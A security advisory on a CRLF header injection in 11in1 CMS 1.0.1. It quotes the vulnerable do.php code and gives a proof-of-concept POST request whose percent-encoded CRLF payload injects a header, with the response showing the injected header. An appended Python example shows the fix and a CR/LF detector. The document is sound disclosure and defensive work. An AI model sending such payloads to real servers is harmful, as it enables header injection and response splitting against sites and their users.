11in1 CMS 1.0.1 CRLF Injection

2011-11-08 / 2011-11-09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability

Vendor: 11in1
Product web page: http://www.11in1.org
Affected version: 1.0.1

Summary: Eleven in One is an open-source content management system (CMS) that is powered by PHP and MySQL. It not only helps you manage your personal blog but also maintains your postings on social networks. By establishing consistency among the data transmitted from and to the blog, this CMS sustains continuous harmonization of your data over time.

Desc: Input passed to the 'content' parameter in 'do.php' on line 2112 is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

==============================================================
/admin/do.php:
--------------------------------------------------------------
2088: // update status
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))
2090: {
2091:     $content = htmlspecialchars($_POST['content']);
2092:
2093:     // Get database information
2094:     $Database = new Database;
2095:     $info = $Database->getInfo();
2096:
2097:     // connect to database
2098:     $conn = mysql_connect($info[0], $info[1], $info[2]);
2099:     mysql_select_db($info[3], $conn);
2100:
2101:     $date = date("Y-m-d H:i:s");
2102:
2103:     // clear table
2104:     $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");
2105:
2106:     // close connection to db
2107:     mysql_close($conn);
2108:
2109:     // prepare success message
2110:     $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);
2111:
2112:     header("Location: msg.php?connect=yes&status=$content");
2113: }
==============================================================

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           MySQL 5.5.16
           PHP 5.3.8

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab

Advisory ID: ZSL-2011-5055
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php

06.11.2011

------

POST /11in1/admin/do.php?action=postStatus HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection

--

HTTP/1.1 302 Found
Date: Sun, 06 Nov 2011 18:53:29 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: msg.php?connect=yes&status=
 ZSL-Custom-Header: love_injection
Content-Length: 1716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html
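As an added defender-side illustration (not code from the advisory or from 11in1), the following Python models the do.php flow above: htmlspecialchars-style escaping leaves CR and LF untouched, whereas percent-encoding the value for its URL context (what PHP's rawurlencode does) and refusing any header value that still contains CR/LF closes the hole. ADVISORY_BODY is the advisory's own POST body; the function names are assumptions of this example.

```python
import html
from urllib.parse import quote, unquote_plus

# The advisory's own POST body, reused here as the sample input.
ADVISORY_BODY = "content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection"


def header_value_is_safe(value: str) -> bool:
    """A header value may never contain CR, LF or NUL. This also catches the
    CRLF-plus-space (obsolete line folding) form the advisory's payload uses,
    which a check that only looks for CRLF followed by a letter would miss."""
    return not any(ch in value for ch in "\r\n\x00")


def decode_form_param(body: str, name: str) -> str:
    """Decode one parameter from an application/x-www-form-urlencoded body,
    as PHP does when it populates $_POST (simplified parser)."""
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        if key == name:
            return unquote_plus(raw)
    return ""


def vulnerable_location(content: str) -> str:
    """Mirror of do.php lines 2091 and 2112: htmlspecialchars() escapes & < >
    and quotes but leaves CR/LF alone, so the value still ends the header line."""
    escaped = html.escape(content, quote=True)
    return "msg.php?connect=yes&status=" + escaped


def hardened_location(content: str) -> str:
    """Encode the value for its URL context (PHP: rawurlencode), then refuse to
    emit the header at all if CR/LF somehow survived."""
    location = "msg.php?connect=yes&status=" + quote(content, safe="")
    if not header_value_is_safe(location):
        raise ValueError("refusing to emit a Location header containing CR/LF")
    return location


def request_carries_crlf(body: str, name: str) -> bool:
    """Detection side: flag a request whose decoded parameter carries CR/LF."""
    return not header_value_is_safe(decode_form_param(body, name))


if __name__ == "__main__":
    payload = decode_form_param(ADVISORY_BODY, "content")
    print(repr(vulnerable_location(payload)))  # CRLF still present
    print(hardened_location(payload))          # CR/LF percent-encoded
```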

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php
